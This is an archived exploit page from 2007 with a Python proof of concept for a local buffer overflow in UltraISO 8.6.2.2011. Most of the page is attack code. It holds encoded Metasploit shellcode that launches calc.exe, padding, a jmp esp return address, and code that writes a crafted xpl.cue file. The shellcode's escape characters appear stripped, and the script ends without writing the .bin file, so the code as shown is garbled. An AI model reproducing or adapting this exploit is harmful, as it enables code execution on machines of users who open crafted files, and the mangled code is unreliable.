UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit 2

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit 2
# Published : 2007-05-28
# Author : Thomas Pollet
# Previous Title : Mac OS X < 2007-005 (vpnd) Local Privilege Escalation Exploit
# Next Title : UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit

#
#ultra iso exploit
#thomas . pollet @ gmail . com
#

import struct
scode=(#metasploit calc.exe shellcode
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x50x42x50x42x30x4bx58x45x54x4ex33x4bx38x4ex57"
"x45x30x4ax37x41x30x4fx4ex4bx58x4fx44x4ax41x4bx38"
"x4fx35x42x42x41x30x4bx4ex49x34x4bx58x46x33x4bx58"
"x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c"
"x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x30x45x47x45x4ex4bx48"
"x4fx35x46x32x41x50x4bx4ex48x36x4bx58x4ex50x4bx54"
"x4bx58x4fx35x4ex31x41x50x4bx4ex4bx38x4ex41x4bx38"
"x41x30x4bx4ex49x38x4ex45x46x52x46x50x43x4cx41x53"
"x42x4cx46x46x4bx48x42x44x42x43x45x38x42x4cx4ax37"
"x4ex50x4bx48x42x44x4ex50x4bx48x42x57x4ex51x4dx4a"
"x4bx48x4ax46x4ax30x4bx4ex49x30x4bx58x42x58x42x4b"
"x42x30x42x50x42x30x4bx48x4ax46x4ex43x4fx55x41x43"
"x48x4fx42x56x48x55x49x58x4ax4fx43x38x42x4cx4bx57"
"x42x55x4ax46x4fx4ex50x4cx42x4ex42x46x4ax36x4ax49"
"x50x4fx4cx48x50x30x47x35x4fx4fx47x4ex43x46x41x56"
"x4ex46x43x56x50x42x45x56x4ax37x45x36x42x30x5a"
)
cue='FILE "'
cue+='B'*1099
#77f84143:       ff e4                   jmp    *%esp
#had to try a few to get a good one 
cue+=struct.pack('<L',0x77f84143)
cue+=scode

cue+='.bin" BINARYn'
cue+=' TRACK 01 MODE1/2352n   INDEX 01 00:00:00'

cue_file = open("xpl.cue","w")
cue_file.write(cue)
bin_file = open("xpl.bin","w")

# www.Syue.com [2007-05-28]